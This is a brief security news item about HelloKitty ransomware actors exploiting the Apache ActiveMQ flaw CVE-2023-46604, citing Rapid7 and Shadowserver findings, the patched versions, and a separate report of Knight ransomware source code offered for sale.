Organizations had their Apache ActiveMQ servers vulnerable to the maximum severity remote code execution flaw, tracked as CVE-2023-46604, targeted in attacks attributed to the HelloKitty ransomware operation, The Hacker News reports.
After exploiting the vulnerability, which has been fixed in recently released ActiveMQ versions 5.15.16, 5.16.7, 5.17.6, or 5.18.3, threat actors leveraged the Windows installer to facilitate the loading of the M2.png and M4.png remote binaries, according to a Rapid7 report.
Further examination of both files showed the inclusion of a .NET executable enabling deployment of the EncDLL payload with ransomware functionality, which performs file encryption following process termination activities.
"Based on the ransom note and available evidence, we attribute the activity to the HelloKitty ransomware family, whose source code was leaked on a forum in early October," said Rapid7 researchers.
Meanwhile, more than 3,300 ActiveMQ servers were noted by the Shadowserver Foundation to be vulnerable to CVE-2023-46604, most of which are in China, the U.S., and Germany.
BleepingComputer reports that Knight ransomware was observed by KELA threat analysts to have the third iteration of its source code posted for sale by the operation's representative, Cyclops, on RAMP forums.